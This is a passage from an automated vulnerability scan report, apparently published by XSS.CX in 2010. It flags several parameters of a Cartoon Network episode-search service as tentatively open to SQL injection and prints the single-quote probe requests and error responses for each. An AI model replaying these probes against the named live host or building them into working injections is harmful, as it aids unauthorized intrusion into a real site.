Host:   http://cnvideosvc2.cartoonnetwork.com
Path:   /svc/episodeSearch/getEpisodesByShow

Issue detail

The networkName parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the networkName parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /svc/episodeSearch/getEpisodesByShow?networkName=HOME' HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Date: Sat, 11 Dec 2010 03:03:52 GMT
Server: Sun-ONE-Web-Server/6.1
Content-length: 8547
Content-type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close

<html>
<head>
   <title>Error Page | Cartoon Network</title>
<script language="JavaScript" src="http://i.cdn.turner.com/toon/toon_adspaces/cnn_adspaces.js" type="text/javascript"></script>
<script langu
...[SNIP]...

Request 2

GET /svc/episodeSearch/getEpisodesByShow?networkName=HOME'' HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:03:52 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/xml
Content-language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 99

<?xml version="1.0" encoding="UTF-8"?>


   <episodes totalItems="0">
   
   </episodes>    
   


1.17. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getFeaturedEpisode [networkName parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cnvideosvc2.cartoonnetwork.com
Path:   /svc/episodeSearch/getFeaturedEpisode

Issue detail

The networkName parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the networkName parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /svc/episodeSearch/getFeaturedEpisode?networkName=HOME' HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Date: Sat, 11 Dec 2010 03:03:48 GMT
Server: Sun-ONE-Web-Server/6.1
Content-length: 8547
Content-type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close

<html>
<head>
   <title>Error Page | Cartoon Network</title>
<script language="JavaScript" src="http://i.cdn.turner.com/toon/toon_adspaces/cnn_adspaces.js" type="text/javascript"></script>
<script langu
...[SNIP]...

Request 2

GET /svc/episodeSearch/getFeaturedEpisode?networkName=HOME'' HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:03:49 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/xml
Content-language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 99

<?xml version="1.0" encoding="UTF-8"?>


   <episodes totalItems="0">
   
   </episodes>    
   


1.18. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getMoreEpisodesLike [filterByCollectionId parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cnvideosvc2.cartoonnetwork.com
Path:   /svc/episodeSearch/getMoreEpisodesLike

Issue detail

The filterByCollectionId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the filterByCollectionId parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /svc/episodeSearch/getMoreEpisodesLike?networkName=HOME&limit=50&howMany=6&filterByCollectionId=' HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Date: Sat, 11 Dec 2010 03:04:06 GMT
Server: Sun-ONE-Web-Server/6.1
Content-length: 8547
Content-type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close

<html>
<head>
   <title>Error Page | Cartoon Network</title>
<script language="JavaScript" src="http://i.cdn.turner.com/toon/toon_adspaces/cnn_adspaces.js" type="text/javascript"></script>
<script langu
...[SNIP]...

Request 2

GET /svc/episodeSearch/getMoreEpisodesLike?networkName=HOME&limit=50&howMany=6&filterByCollectionId='' HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:04:06 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/xml
Content-language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 99

<?xml version="1.0" encoding="UTF-8"?>


   <episodes totalItems="0">
   
   </episodes>    
   


1.19. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getMoreEpisodesLike [networkName parameter]  previous

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cnvideosvc2.cartoonnetwork.com
Path:   /svc/episodeSearch/getMoreEpisodesLike

Issue detail

The networkName parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the networkName parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /svc/episodeSearch/getMoreEpisodesLike?networkName=HOME'&limit=50&howMany=6&filterByCollectionId= HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Date: Sat, 11 Dec 2010 03:03:55 GMT
Server: Sun-ONE-Web-Server/6.1
Content-length: 8547
Content-type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close

<html>
<head>
   <title>Error Page | Cartoon Network</title>
<script language="JavaScript" src="http://i.cdn.turner.com/toon/toon_adspaces/cnn_adspaces.js" type="text/javascript"></script>
<script langu
...[SNIP]...

Request 2

GET /svc/episodeSearch/getMoreEpisodesLike?networkName=HOME''&limit=50&howMany=6&filterByCollectionId= HTTP/1.1
Host: cnvideosvc2.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:03:55 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/xml
Content-language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 99

<?xml version="1.0" encoding="UTF-8"?>


   <episodes totalItems="0">
   
   </episodes>    
   


Report generated by XSS.CX at Sat Dec 11 06:40:07 CST 2010.